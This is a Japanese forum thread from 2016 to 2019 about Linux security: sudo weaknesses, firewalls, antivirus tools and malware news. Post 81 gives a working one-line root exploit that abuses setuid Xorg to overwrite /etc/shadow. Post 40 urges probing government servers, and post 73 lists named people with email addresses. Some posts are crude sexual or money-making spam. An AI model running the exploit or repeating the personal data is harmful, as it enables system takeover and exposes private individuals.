Linuxセキュリティ総合スレ
at LINUX
1:login:Penguin
16/06/12 23:17:47.19 OMH3td/9.net
Linuxを安全に使うためにセキュリティについて語りましょう!
2:login:Penguin
16/06/12 23:38:08.55 yP8FUEwn.net
インターネットに繋がない
3:login:Penguin
16/06/13 06:09:27.32 eDU8tci1.net
電源を入れない
4:login:Penguin
16/06/13 10:29:04.09 Oh9pGuME.net
気にしない
5:login:Penguin
16/06/13 11:01:38.26 2M58TAyx.net
SAKOKU を使う
6:login:Penguin
16/06/13 11:57:17.29 J1aqrsrp.net
勝つためには戦わないこと(´・ω・`)
7:login:Penguin
16/06/13 12:21:18.30 8nJEuh/y.net
手始めにiptableから乗り換える話書けや
8:login:Penguin
16/06/13 15:37:47.75 0TZsX1cx.net
セキュリティ総合ってことはウィルス対策もここでいいよね?
9:login:Penguin
16/06/13 20:14:08.76 4q925383F
Snortを導入する!ただホワイトリスト作るのめっちゃしんどい
10:login:Penguin
16/06/13 20:55:43.29 j5ciL7QT.net
そもそもLinux使うこと自体が対策に成り得る
11:login:Penguin
16/06/13 22:05:23.35 Qr5Zi0oD.net
サイバーノーガード戦法だ
12:login:Penguin
16/06/13 22:14:04.99 K9ELyhAn.net
nftの情報仕入れることを期待してたんだけど、セキュリティのスレなのな。
最近nftに移行はしたけど、iptableで指定した項目が全て移せたわけではないな〜。
13:login:Penguin
16/06/13 22:30:22.37 THPCncF9.net
重複
スレリンク(linux板)
14:login:Penguin
16/06/13 22:50:37.82 4q925383F
FWのログ、数秒間に30個ぐらい色んなDNSサーバにアクセスしてるのを結構見るんだけど、
あらかじめ設定しておいたプロバイダのDNSサーバに問い合わせるだけじゃダメなん?
15:login:Penguin
16/06/20 09:45:44.94 EE0G5RY5.net
UACが欲しい(´・ω・`)
16:login:Penguin
16/06/27 21:17:47.20 1MSZfZlD.net
代わりにキーリングをあげよう
17:login:Penguin
16/07/08 22:16:34.93 nKTBpDXx.net
ぱんつくれ !
18:login:Penguin
16/07/11 20:45:28.85 1UAhQw4h.net
(´・ω・`)・ω・`) キャー
/ つ⊂ \ 怖いー
19:login:Penguin
16/07/16 12:23:29.36 az2Lvjtg.net
make pan
20:login:Penguin
16/07/28 14:39:09.27 vgMn1AfM.net
残念ながらいくつかの解決が困難な問題のせいで今やUnix/LinuxよりWindowsのほうが遥かにセキュアだからな。
被害が少ないのはただ単に狙われてないからってだけ。
1.su/sudoが糞
glibcの脆弱性GHOSTの発見に関わった人のコメント
URLリンク(www.openwall.com)
> If it would be permitted for a non-root user to su to root, then anyone who could have compromised the user's account[1] would also be able to hijack a su session[2] and then su to root himself.
> [1] Such a compromise could occur in a variety of ways: Web/FTP/etc.
> client vulnerabilities, password snooping, etc.
> [2] For example, edit the user's shell startup scripts to make su an alias for a custom su wrapper program.
URLリンク(www.openwall.com)
> unfortunately both su and sudo are subtly but fundamentally flawed.
> So the separation between the non-root and the root accounts is lost.
suやsudoを使える非rootのアカウントが攻撃者に侵入された時点で、攻撃者はそのアカウントの~/.bashrcなどにパスワードを盗むラッパーを実際のsu/sudoのaliasやfunctionとして仕込んだり出来る。
次に正規のユーザーがsu/sudoを使おうとすると攻撃者の仕込んだラッパーが実行され攻撃者はパスワードを得ることが出来、あとは攻撃者もsu/sudoを使い放題となる。
結果としてこれらのツールのせいでrootと非rootというユーザーの分離という一番基本的なセキュリティさえ無意味になっている。
21:login:Penguin
16/07/29 08:18:56.26 3v5CyHDC.net
じゃけんSELinux使いましょうね
22:login:Penguin
16/07/29 11:43:36.67 c3kWqYGY.net
セキュリティ対策がはっきりしない以上Win使いしかいない
でもw10こわいわー
23:login:Penguin
16/07/29 12:00:07.41 r5rsVV/0.net
>>20
侵入された時点でおしまいだろうに何言ってんだこいつって感じですかね。
24:login:Penguin
16/07/29 15:11:35.83 2cIkyZpH.net
>>23
今の時代は「侵入された時点でおしまい」が許されないからこそブラウザとかはseccompやnamespaceを駆使して仮に脆弱性経由で何かコードが実行されても被害を最小限に食い止めるようにsandbox化に力を入れてたりするんだが
そもそもそれが許されるなら、一人で使うデスクトップ用途ではUbuntuみたいなわざわざ「普段非rootでログインして必要な時だけsu/sudoでrootになって実行する」
っていう行動にはセキュリティ的には何の意味もない、最初からrootでログインしてそのままエロサイト巡りしても何ら問題ないって事になるのは理解できるか?
もっとも昔はそれでも問題ないレベルだったのでWindowsではAdministratorでのログインがデフォになってたわけだが
そのあたりをきちんと理解しないで「Unix/LinuxはWindowsよりセキュアなんですーー」で思考停止してる馬鹿が大多数のせいで今の現状があるわけだ
その間にWindowsは、UACのように権限を得るためにはきちんとそれぞれへの入出力の機密性やコマンド自身の完全性をきちんと確保して「異アカウント間の分離」を破壊しないように考慮したり、
ILのように同アカウント内でもきちんとプロセス間を分離して保護(これは>>21の言うように強制アクセス制御で"一部"は解決できる)することでよりセキュアに進化した
一方残念ながら思考停止したUnix/Linuxは、権限を得るために「何の保護もない環境」から実行される「何の保護もされてないsu/sudoコマンド」に対して「何の保護もされてない状態でパスワードを入力する事」状態が放置され、
その一番基本的な「異アカウント間の分離」すら無意味になってる体たらく
結果的に「(sudoが使える非rootユーザーが)侵入された時点で(システム全体が)おしまい」になってるので、一周回ってお前の言ってることも正解なわけだがな
25:login:Penguin
16/07/29 15:40:50.53 2cIkyZpH.net
一応フォローしとくとLinux kernel自体は割ときちんと進化してるな、NXとかASLRとかYamaとかLSMとか
きちんと設定されてなかったり(互換性のせいで出来ない)、ユーザーランドが糞の寄せ集めなせいで台無しだが
26:login:Penguin
16/07/29 16:57:07.30 AresjTJd.net
うんそれはご説ごもっともなんだけどさ、ただ危ないぞって騒ぐだけじゃなくて被害に遭った卑近な例とか挙げられないのかな?
卑近なって言ってもあなたの身近な人じゃなくてネットで皆の目に触れるようなブログやフォーラムでいいんだ。
xpが終わる時にデスクトップLinuxがって騒いでから、Linuxといえどのほほんとしてられないってのはみんな思ってることなんだ。
だから知りたいのは、いかに危険か、ではなく、危険なブツに出くわした時にどうすべきか、出くわした人はどう対処したか、なんだよ。
開発に携わった人のブログやコラム見つけて危険だ危険だって焚き付けるのなんて思考停止してもできることだろ?
LinuxユーザーがWindowsは危険だと騒ぐのが思考停止ならWindowsユーザーがLinuxは危険だと騒ぐのもまた思考停止じゃないの?対策を示すとか何かしない限り。
まるで、ゲームのバグを見つけたからプランナーや開発者より自分の方が優秀だって威張ってるデバッガーみたいだよ君は。
27:login:Penguin
16/07/29 17:23:02.18 2cIkyZpH.net
>>26
俺みたいなゴミクズには解決する力も政治力もないから2chみたいな掃き溜めでグチってんのよ
Linux好きだから改善してほしいし、もし同じように問題だと感じる人が増えてくれれば改善される可能性も増すしね
そのために敢えて居丈高にLinuxに厳しくWindowsに甘く書いたんだ、ゴメン(´・ω・`)
28:login:Penguin
16/07/29 17:53:59.24 53ApPnD4.net
windowsが仮に安全つうのは
あることするには続きは窓操作も必要だからじゃね?(あるいは暗号のようなパス書かないと辿れないとか)
そういう不便さを有難くセキュリティーが強いというのかどうか
29:login:Penguin
16/07/29 19:36:23.87 IWyIiLvv.net
Windowsがセキュリティーを確保しているのは専業のベンダー各社が競争に晒されながら製品を開発しているからであって、Windows自身が特段セキュリティに優れる訳じゃない
30:login:Penguin
16/07/29 21:02:48.88 2cIkyZpH.net
URLリンク(blog.martin-graesslin.com)
KDEの開発の人とかちゃんといまのXやシェルとかの実行環境には問題があることを認めてどうしたら良いか考えてる人もいるんだよなー
でも自分の開発してるソフトウェアだけが対応してもshellとかの他のソフトウェアのせいでそれが無意味になっちゃったりで困ってる
31:login:Penguin
16/07/30 13:47:31.26 m4BHHueF.net
強制アクセス制御だけでハッキングを防御できるの?できないの?
それと、強制アクセス制御のステータスってのは何らかのファイルにロギングされんの?
32:login:Penguin
16/07/30 13:54:08.97 m4BHHueF.net
Linuxなんてのは宮大工が構築した接ぎ木細工のようなもの。
ノーガードきめこんで運用してたら、そりゃあ狙われた時に簡単にクラッシュしますがな。
(肝心な釘打ち無しで構築してるもんだから)
Windowsの世界ではねセキュリティソフト入れて丸投げしてるわけ。
但し、ユーザーの中には変わり者がいて、ノーガードな奴もいる訳、
まあ、他人ごとでどうなろうが知ったことじゃないが…
33:login:Penguin
16/08/13 02:05:03.68 oD+tGgzq.net
LinuxのTCPに脆弱性、トラフィックを乗っ取られる恐れ
URLリンク(www.itmedia.co.jp)
34:login:Penguin
16/08/13 04:51:41.40 aN9vHd6i.net
>>33
すぐ更新されるから慌てなさんな
35:login:Penguin
16/08/13 08:48:05.17 TXBKXjH8.net
>>34
2012年からあった脆弱性がすぐに修正されるの?
36:login:Penguin
16/08/13 08:55:27.99 1K0xoI1z.net
すでにパッチは出ているぞい
37:login:Penguin
16/08/13 11:19:12.09 UrcrvCqb.net
大して重要じゃないと思われてたから放置されてただけで、
修正が難しいわけじゃないのだろう。
38:login:Penguin
16/08/14 13:17:03.39 gduCaAAf.net
「誰も気づかなかったけど2012年からひっそり存在していた物が今発見されてすぐに修正された」
だろ
39:login:Penguin
16/08/14 14:21:25.00 IM019vfG.net
日本の官公庁のサーバのセキュリティってまともなの?
40:login:Penguin
16/08/14 18:52:10.23 fe3iWrgq.net
>>39
自分で確認したら?ガバガバだから。ただし、法令違反で引っ張られないように工夫しろよ。
官公庁はWindows serverじゃないの?
41:login:Penguin
16/09/03 02:42:39.64 T3i7Gd65.net
アグレックスって その13
なんで飲み行かないの?
なんで女の子誘って飲みに行かないの?
声掛けないと飲みいけないのに。
話しないと恋は始まらないよ。
声掛けないとSEXもさせてくれないのに。
声掛けないから、
ヤンキーみたいなオジサンが誘いだして大きなこと言って、不倫してるよ。
女の子誘って飲みにきなよ。
女の子に声掛けないと、恋も出来ないよ。
SEXしたかったら、声掛けて飲みに行きなよ。
残業してる間に、持っていかれちゃってるよ。
後ろから見たら、がに股になってる女の子見たことない?
SEXしたかったら、なんでもいいから声掛けて飲みに行きなよ。
残業しても恋はできないよ。SEXできないよ。
恋をしなけりゃ、SEXはさせてもらえない。
恋をするには、話して気に入ってもらうしかない。
気に入ってもらうには、飲み行くのが近道だろ。
別に会議で、大きな事言ってもいいけど。
どうせSEX出来るまで何度も繰り返すんだろうから、
そのうち年配の方々にめんどくさがられて、遠くに飛ばされるよ。
そんなだったら、飲みに行くのが一番だろ。
別にがに股のさせこちゃんを探して、お願いしてみてもいいけど。
ばれたとき、周りの目が厳しいぞ。
お前が呼ばないから、ほらみろ可愛い子はみんなやられて。
残っているのはブスばかりになってるじゃないか。
ブスはキツイぞ。
誘えないなら、韓国人でも買えよ。みんなそうしてるぞ。
42:login:Penguin
16/09/06 16:46:15.64 vVf8gi4f.net
clamAVでは不安だお(´・ω・`)
43:login:Penguin
16/09/06 22:53:44.42 TopTMWtn.net
>>42
なんでよ?シスコ様だぞ?
44:login:Penguin
16/09/07 07:09:59.88 O110MSh/.net
常駐じゃないと安心できないマン
45:login:Penguin
16/09/13 10:37:58.85 g0CBlyhH.net
常駐か駐留か進駐か それが問題である
46:login:Penguin
16/09/17 18:12:13.92 9GLGaOH4.net
ギブミーチョコレート
47:login:Penguin
16/09/29 12:32:01.60 ZwQJlT8x.net
尻|ω゚ )┻┛身動きとれんのだが・・・
48:login:Penguin
16/09/29 12:44:59.58 5wiRFmuo.net
NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""
49:login:Penguin
16/09/29 12:54:29.04 lvJNOdKb.net
最強のiptablesの設定をうぷしてくれる神いないの?
50:login:Penguin
16/09/29 20:57:19.24 SWTYFo2r.net
firewalldに乗り換えれ
51:login:Penguin
16/10/04 17:05:57.73 ZgAPWl/3.net
>>50
乗り換えると最強になるの?
52:login:Penguin
16/10/04 21:10:03.74 MfnjwfuN.net
設定が簡単になるから、「設定をうぷしてくれ」とは思わなくなる
53:login:Penguin
16/10/23 10:01:10.29 PWQ2IPcX.net
>>52
出て行く通信のフィルタを書くためには
結局IPTABLES書かなきゃいけないのはなおった?
なおったなら乗り換える。
54:login:Penguin
16/11/30 12:37:43.41 SfHGIzEu.net
∧,,,∧
(´・ω・) < おっかのうえひっなげしのはぁながぁぁ 〜
(U )
`u-u´
55:login:Penguin
17/01/20 17:47:06.69 OITYnSWZ.net
___
(\ ∞ ノ
ヽ)_ノ 迫る〜パンチ〜〜♪
(=O┬O
◎-ヽJ┴◎ キキ〜
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
56:login:Penguin
17/02/01 08:09:39.67 gwo76No6.net
.γ ⌒ ヾ
(´・ω・`) 迫る〜ハゲッ♪
(=O┬O
◎-ヽJ┴◎ キキ〜
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
57:login:Penguin
17/02/13 20:59:43.28 aKHZLuDZ.net
顔がでかいなぁ・・・
58:login:Penguin
17/03/08 21:47:52.30 TuQ4x/Y7.net
∧_∧
.ミ,,・_・ミ 迫る〜ハゲッ♪
(=O┬O
◎-ヽJ┴◎ キキ〜
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
59:login:Penguin
17/04/19 13:43:38.91 kexeXY6M.net
(´・ω・´・ω・ω・`)知らんがなトリオ
60:login:Penguin
17/04/28 16:59:33.55 ZiXyj8JT.net
Linuxの方がWindowsよりもセキュアだっていうのは
過去の話なんすね。それなのに未だにLinuxを
安全って紹介してる所ばかりなのは何でですかね
61:login:Penguin
17/04/30 00:21:15.39 zhwkJ+1u.net
Linuxで被害出たという報告は少ないでしょ
Windowsでは散々あるけど
62:login:Penguin
17/04/30 00:36:51.26 3yi8UZQK.net
使う奴のスキル/知識レベル次第だから、OSが解決できる問題じゃないよ
63:login:Penguin
17/04/30 14:38:15.54 6nvs6+SR.net
んだんだ !
64:login:Penguin
17/04/30 19:21:48.33 K1kIRV9a.net
clamとかselinuxとか、皆さん使っていますか?
マシンの使用用途によりけりだとは思いますが、
僕の自宅鯖はfail2banだけです。
有用な物や便利な物があれば教えて欲しいです。
65:login:Penguin
17/05/09 10:29:04.72 6kIUOBHa.net
他人のサーバ管理してるけど、
今までosの脆弱性突かれてどうこうてのは
無いなあ
過去10年起きたのは、全てユーザーの問題
クソみたいなパスワード突破されたとか、
ゴミみたいなコードからのインジェクションとかのみ
66:login:Penguin
17/06/16 09:15:27.82 Cv6QgGNP.net
今年も夏を乗りきれず逝く小型PCがいるのでしょうね
67:login:Penguin
17/06/16 09:16:10.27 Cv6QgGNP.net
誤爆失礼
68:login:Penguin
17/07/03 23:36:13.34 cDHqg+NI.net
openssl enc -e -aes256
で暗号化してたファイルが、急に、
openssl enc -d 〜
で開けなくなりました。
ファイルが壊れたかとめちゃくちゃ焦ったけど、
タイムスタンプは去年のまま変化なし。
本家から、1.0.2lを落としてコンパイルした実行ファイルからだと
問題なく開けたからファイルの問題ではない模様。
1.1.0のバグですか?
#確か2ヶ月前ぐらいだとパッケージインストールされている
1.1.0系でも問題なかったはずですが。
linux-mint(ubuntu16.04)です。
69:login:Penguin
17/07/04 01:23:11.94 RdyHvcf/.net
>>68
くだらねえ質問はここに書き込め!Part 228
スレリンク(linux板)
で聞いたほうが良いと思う
70:66
17/07/05 00:22:13.88 uEgHtGC3.net
>69
ありがとう。
次回からそうするわ。
ちなみに、今回のは下記参考に自己解決したっぽい。
-md md5付けたら、現行1.1.0でもファイル開けました。
URLリンク(github.com)
URLリンク(unix.stackexchange.com)
71:login:Penguin
17/09/07 19:37:24.22 NhVQ+S22.net
すまん誰か教えてくれ!
全くセキュリティーパッチを充てていないrhel6.1で、poodle対策をしなきゃいけないんだが、
設定変更だけで対処する場合は、ssl.confのcipherのところに -sslv3入れるだけで良い?
72:login:Penguin
17/10/16 19:17:31.78 AvEU8VfP.net
。o0○( zzzz… )
_,,..,,,,_
/ ,' 3/⌒ヽ-、_
/l. /____/
 ̄ ̄ ̄ ̄ ̄ ̄ ̄
73:login:Penguin
17/11/03 21:09:20.77 UMEHXcXh.net
【 日立製作所 】焦土戦
セキュリティの基本は尖らないこと、目立たないこと。隠すこと。 バカ。
新名主 隆志 TIS shimmyozu.takashi@technopro.com
色田 眞吾 日立製作所 Shikita.Shingo@technopro.com
八木 一暢 TIS yagi.kazunobu@technopro.com
水野 潤 ハマゴムエイコム Mizuno.Jun@technopro.com
佐々木 優也 (首都圏第1支店案件) sasaki.yuya@technopro.com
佐々木 健太 日立製作所 sasaki.kenta@technopro.com
中野 洋行 NSSLCサービス Nakano.Hiroyuki@technopro.com
永井 真祐子 富士ソフト nagai.mayuko@technopro.com
品川区高輪3-25-33
都内のトイレに花子さんだ
日立の末端は、ただの派遣会社だからな。メーカーはどこも一緒か。。
74:login:Penguin
17/12/29 13:14:18.48 S/CsVkMC.net
誰でも簡単にパソコン1台で稼げる方法など
参考までに、
⇒ 『宮本のゴウリエセレレ』 というブログで見ることができるらしいです。
グーグル検索⇒『宮本のゴウリエセレレ』
HRT6GIPYTB
75:login:Penguin
18/04/11 07:03:34.17 9VtMkuZE.net
。o0○( zzzz… )
_,,..,,,,_
/ ,' 3/⌒ヽ-、_
/l. /____/
 ̄ ̄ ̄ ̄ ̄ ̄ ̄
76:login:Penguin
18/05/22 11:10:27.97 Czl6p0FW.net
僕の知り合いの知り合いができた副業情報ドットコム
関心がある人だけ見てください。
グーグルで検索するといいかも『ネットで稼ぐ方法 モニアレフヌノ』
BTBIK
77:login:Penguin
18/05/26 09:20:44.99 c6Ml0Dod.net
【緊急】LinuxベースのルーターやNASに感染するマルウェア「VPNFilter」、54カ国50万台に感染か
スレリンク(news板)l50
78:login:Penguin
18/05/26 12:43:59.58 H0+abEbN.net
大問題じゃないか
79:login:Penguin
18/05/27 16:31:34.31 QzfBv+yQ.net
Windowsのセキュリティにはうるさい犬厨もそっ閉じ。つまり、犬問題w
80:login:Penguin
18/07/08 20:50:42.96 QTYf4jMn.net
。o0○( zzzz… )
_,,..,,,,_
/ ,' 3/⌒ヽ-、_
/l. /____/
 ̄ ̄ ̄ ̄ ̄ ̄ ̄
81:login:Penguin
18/10/31 11:46:41.86 XLo7vX23.net
suid付きXorgを使ったroot昇格法
URLリンク(www.exploit-db.com)
cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su
xorgはフォントパスのリストをそのままログに書き込むことを利用してる
(shadowが上書きされるので試すならshadowのバックアップを取ってからどうぞ)
82:login:Penguin
19/03/10 12:39:41.95 BHkfBLF0.net
i"\ ))
| 8 )
∧,,,∧∩-''"
_ ..(´・ω・`)彡 おぱんつ おぱんつ ! !
〃(\ ∞ ,⊂彡
`ヽ)_ノ| |
し⌒J
83:login:Penguin
19/05/24 01:31:09.68 WQ5DwMzT.net
彡⌒ ミ
( ´ ・ω・) 呼んだ ?
84:login:Penguin
19/05/31 12:30:43.06 bdQbsGXY.net
Linuxを狙うマルウェア「HiddenWasp」に注意 2019/05/31 06:55 後藤大地
URLリンク(news.mynavi.jp)
Intezerは5月19日(米国時間)、Linuxシステムを標的とした新しいマルウェア「HiddenWasp」を
発見したと「Intezer - HiddenWasp Malware Stings Targeted Linux Systems」で伝えた。
このマルウェアは現在も活動を継続しており、主要なアンチウィルスシステムで検出することが
できないと指摘されている。発見されたHiddenWaspの主な特徴は以下の通り。
・Linuxマルウェアの多くは仮想通貨マイニングやDDoS攻撃に焦点を当てているが、HiddenWasp
は異なっている。HiddenWaspはトロイの木馬として設計されており、標的のシステムを純粋に
リモートコントロールするために開発されている
・HiddenWaspに感染しているユーザーはすでに標的型攻撃のターゲットになっている可能性が
高い
・HiddenWaspはMiraiやAzazelルートキットといった入手可能なオープンソース・マルウェア
から大量のソースコードが流用されている
・HiddenWaspは中国のマルウェアファミリーに強い類似性があるものの、帰属に関しては可能
性が低いと見られる
Intezerは、Linuxを標的としたマルウェアは時間の経過とともにますます複雑になり続けている
と指摘。現在、一般的な脅威でも検出率があまり高くないが、より高度な脅威はさらに検出率が
低いという。今後、Linuxを標的としたマルウェアはさらに検出が難しくなるおそれがあり、
注意が必要。
85:login:Penguin
19/06/01 00:37:42.11 /N3jDoCj.net
>>84
これはひどい
俺が唯一Linuxに移行できない理由がアンチウイルスソフトだからな
Windowsのノートンみたいに完璧なのがあれば、ノートン一つで完全に防げるけど、
Linuxにはこれがないからな
SophosAntiVirusがあるが、なぜか定義ファイルの更新が20日異常ないぞ(気のせい?)
RKHunter、Tripwire、Lynis、Firewallとかだけとかありえんだろ?
86:login:Penguin
19/06/01 03:51:20.70 BeN0lDY7.net
Linuxだから安全です。
87:login:Penguin
19/06/01 08:23:33.96 0WGBvA8D.net
ウィルス検体を各所に送り対応が早いとこは半日だったが
ノートンは3日後だったことがあった
88:login:Penguin
19/06/01 23:05:01.15 aQmSSgBv.net
>>85
毎日更新してるんじゃないかな
ノートンやトレンドマイクロが対応してない最新のウィルスを先んじて検出したことがあったし、古い日付になってる定義ファイルはベースとなるやつの日付だと思ってる。
89:83
19/06/02 01:29:08.34 Zexh2AIq.net
$ sudo /opt/sophos-av/bin/savupdate
次のバージョンをアップデート中です - SAV: 9.15.1、エンジン: 3.74.2、データ: 5.63
Updating Sophos Anti-Virus....
Updating SAVScan on-demand scanner
Updating Virus Engine and Data
Updating Manifest
Update completed.
次のバージョンにアップデートしました - SAV: 9.15.1、エンジン: 3.74.2、データ: 5.63
sdds:SOPHOS からの Sophos Anti-Virus のアップデートに成功しました
$ sudo /opt/sophos-av/bin/savdstatus --version
Copyright 1989-2018 Sophos Limited. All rights reserved.
Sophos Anti-Virus = 9.15.1
ビルドのリビジョン = 2793374
脅威検出エンジン = 3.74.2
脅威データ = 5.63
検出脅威数 = 35620036
脅威データリリース日 = 2019年05月07日 00時00分00秒
前回アップデートを確認した日時 = 2019年06月02日 01時01分28秒
と脅威データリリース日がずっと5/7のままなんだよね
これでも最悪1日毎には更新してるのかね?
ノートンだと1時間に1回は更新してるっぽいけど
更新しててくれてると助かるのだが
90:83
19/06/02 01:30:11.25 Zexh2AIq.net
>>87-88へね
91:83
19/06/03 00:52:09.01 LINEVdyy.net
>>87-88
ここ見たらやはり1日1回ぐらいは更新されてそう
実際俺のSophosは普通に6/2更新されてた
どうも"脅威データリリース日 = 2019年05月07日 00時00分00秒"と
ウイルス定義ファイル更新日は違うらしい
ウイルス定義ファイル更新日もちゃんと書けよ>Sophos
Sophos Anti-Virus: ウイルス定義ファイル (IDE ファイル) が最新の状態にアップデートされているかどうかを確認する方法
URLリンク(community.sophos.com)
92:login:Penguin
19/06/03 02:02:29.21 jJq3PPoG.net
野良アプリをたくさん入れるWindowsではウイルス検知ソフトが不可欠だね。
93:login:Penguin
19/06/03 02:06:37.36 jJq3PPoG.net
しかし、経験上、ウイルス検知ソフトはそれほど当てにできない。
世に知れ渡っていないウイルスが仕込まれていた場合に
ウイルス検知ソフトがそれを正しく検出してくれることはまれ。
何ヶ月か何年かあとになって改めてチェックしてみると検出される場合がある。
でもダウンロードあと、そこまで待ってインストールする人はいない。
94:login:Penguin
19/06/03 08:05:48.00 eMJGOUo4.net
>>84
これの元記事によるとvirustotalで引っかからない
URLリンク(www.intezer.com)
つまりノートンだろうが何だろうが脅威としないで放置されるということ
感染経路はわからんが野良危険ということだろう
95:login:Penguin
19/06/03 22:51:46.35 sgwkICkl.net
>>84
これは具体的にどう注意したらいいんだ?
96:83
19/06/03 22:56:08.11 LINEVdyy.net
やはり、Sophosのウイルス定義ファイル更新は1日1回はあるな
↓となってるから(途中に更新あったかは知らんが多分ないだろ)
昨日
<published>2019-06-02T13:03:35</published>
今日
<published>2019-06-03T13:07:34</published>
97:login:Penguin
19/06/04 11:45:07.22 JnEdCGFR.net
ソフォス個人情報入れないとダウン出来ないの?
98:83
19/06/04 23:57:45.16 8eAlB9kG.net
>>97
全部、適当に入れればいいよ
メアドは@と.orgとか.comは入れないとだめだけど、これも適当で大丈夫
99:login:Penguin
19/06/05 09:35:56.10 2u//H+UO.net
電話番号とか住所も?
100:login:Penguin
19/06/05 21:45:09.38 1PL8mpQb.net
電話番号、住所って書く欄あったっけ?
あったとしても、100%適当で通るよ
役職・法人名も適当でおk
国、県、郵便番号は日本、東京、1000000でおk
ちなみにLinux版はこれね
URLリンク(secure2.sophos.com)
URLリンク(www.sophos.com)
ここからいって普通に全部適当に入力しおわったら、自動でダウンロード始まるよ
101:login:Penguin
19/06/06 13:34:15.13 Vt0/9sNy.net
>>100
都道府県がなぜか受け付けてくれない
102:login:Penguin
19/06/06 20:22:08.58 yFuR+pcY.net
>>101
先に国名で「日本」選んだら都道府県欄に▲▼が出て、普通にマウスクリックで「Tokyo」が選べるようになるでしょ
国名: 日本
都道府県:Tokyo
郵便番号:100-0000
で大丈夫だよ
103:login:Penguin
19/06/07 09:06:17.12 boyNvVP0.net
>>102
▲▼が出てこない
104:login:Penguin
19/06/07 20:09:33.53 /Sk2vmHZ.net
ブラウザでsophos.comのCookeiとJavaScriptオンにしないとだめだよ
オフになってるんじゃない?
105:login:Penguin
19/06/07 21:33:16.30 yVEJ6IS3.net
Symantec Endpoint ProtecitonmpLinux用クライアントをインストールしてみたんだが、あかんファイルは警告無く消し、しかも事後報告が無いのな
これはちと使えないわ
106:login:Penguin
19/06/07 23:40:08.48 /Sk2vmHZ.net
Symantecのって無料版あったっけ?
107:login:Penguin
19/06/08 02:35:25.81 /huWGbTD.net
Symantec Endpoint Protection for linux良さそうだが、
1年間9500円アップグレード4700円って高いな
ライセンスだけでメンテナンス不要版もあるの?
値段はここの43ページ
URLリンク(www.symantec.com)
108:login:Penguin
19/06/10 15:44:13.86 9N/TTeW/.net
LinuxでUEFIスキャナーがついたアンチウィルスソフトってありますか?
ESETはWIn版にはあるみたいだけど、Linux版にはないみたいだし。
UEFIの脆弱性(Intel ME)を考えたらLinuxパソコンの最大の弱点はUEFIだと思うのですが。
オープンソースで誰か作ってくれないかな・・・
109:login:Penguin
19/06/18 02:35:54.34 AVJfVicP.net
マイクロソフト、Azure顧客にEximワームに注意を呼びかけ
Catalin Cimpanu (ZDNet.com) 翻訳校正: 編集部 2019年06月17日 10時47分
URLリンク(japan.zdnet.com)
Microsoftは米国時間6月14日、「Exim」経由で拡散するLinuxのワームについて、一部の
Azureも影響を受けるとしてAzure顧客向けに警告を出した。
このワームは米ZDNetが6月13日に最初に報じ、その後詳細情報がレポートされたもので、
CVE-2019-10149の脆弱性を利用してEximメールサーバーに感染する。この脆弱性は、悪用
されると攻撃者が遠隔からコマンドを実行してパッチを当てていないシステムを乗っ取る
ことができるというものだ。
ワームはこの脆弱性を利用してサーバーを乗っ取り、他のサーバーをスキャンして感染を
広げようとする。そして乗っ取ったホストに暗号通貨マイニングを投下する。
Eximはメール転送エージェント(MTA)で、Linuxベースの電子メールサーバー上で動かし
送信者から受信者に電子メールのリレーを行う。このワームはEximが動くサーバーを狙う。
Microsoftが14日に出した警告によると、Azureインフラもこのワームの影響を受けると
いう。幸い、Azureインフラは「このワームの拡散を制限するのを助けるための制御」を
敷いているとMicrosoftは述べている。(後略)
110:login:Penguin
19/06/18 17:26:10.39 6P/bvjY8.net
Netflix報告: Linux Kernel又はFreeBSDのリモートから攻撃可能な脆弱性(TCP SACK
PANIC) (CVE-2019-11477, CVE-2019-11478, CVE-2019-11479, CVE-2019-5599)
2019年6月18日 05:11 Kazuki Omo
URLリンク(security.sios.com)
こんにちは。SIOS OSSエバンジェリスト/セキュリティ担当の面 和毅です。
06/17/2019にNetflixからFreeBSDとLinux Kernelに対して、幾つかのTCPの脆弱性に関する
アドバイザリーが出されました(CVE-2019-11477, CVE-2019-11478, CVE-2019-11479,
CVE-2019-5599)。アドバイザリーは最小セグメントサイズ(MSS)とTCP SACKに関するものに
なります。最も深刻な「SACK Panic」と呼ばれるものは、最近のLinux Kernelにリモート
からKernel Panicを引き起こすことができます。Netflixの方でPatchも提供されています。
今後も情報が出てくると思われますので、こちらで取り上げます。
逐次情報は更新していく予定です。
111:login:Penguin
19/06/22 09:34:44.67 BWxAJ8Sj.net
>>110に関連して、アップデートが大量に来ている。
また、
◆snapアプリのアップデートはaptコマンドでは不可能である。
初心者向けに、Ubuntuを例にセキュリティーアップデートの手順を示す。(Kubuntu、Xubuntu、LubuntuなどのUbuntuフレーバーたちも同じ)
(1)ターミナルを開き、下記のコマンドを打ち、最新情報を取得する。
$ sudo apt update
(2)最新の情報が取得され、システムは最新ですとの表示が出たら(4)に飛ぶ。もし、アップデートの必要のあるパッケージがあることが示されたら、次のコマンドを打ち、パッケージをダウンロードしてインストールする。
$ sudo apt -y upgrade
ちなみに「-y」オプションは付けても付けなくても良いが、付けなかった場合には、インストール直後に本当にインストールして良いを[Y/N]と表示して確認してくる。この場合はYesを意味するYを押すことでインストールが始まる。
「-y」オプションを付けるとこの手順が飛ばされてダウンロードが完了次第、すぐにインストールが開始される。
(3)次の2つのコマンドは、それぞれ上記のコマンド実行の結果として、不要となった古いパッケージ、不要となったキャッシュを削除する。掃除であるから実行はたまにで良いが、ストレージ容量が少ない環境の人は頻繁にやるべきだろう。
$ sudo apt autoremove
$ sudo apt autoclean
(4)次にsnapアプリの更新を行う。
$ sudo snap refresh
snapアプリをインストールした覚えが無くとも、システムがsnapを使っているため必ず実行すること。例えばGNOMEシェルはsnapであり、Ubuntu18.04.x LTSはすでに更新の必要が出ているので、未実行であれば直ぐに実行し最新版にしよう。
GUIからはすべてのアップデートや掃除はできない。取り分けsnapは(4)の手動アップデートでなければ更新できない。
出来るだけ毎日、しっかりアップデートを行い、セキュアなLinuxライフを送ろう。
112:login:Penguin
19/07/03 23:55:13.69 OptOlEBI.net
>>1
Linuxなんて使わない。
以上。
113:login:Penguin
19/09/29 21:20:57.29 Nip3Jzi1.net
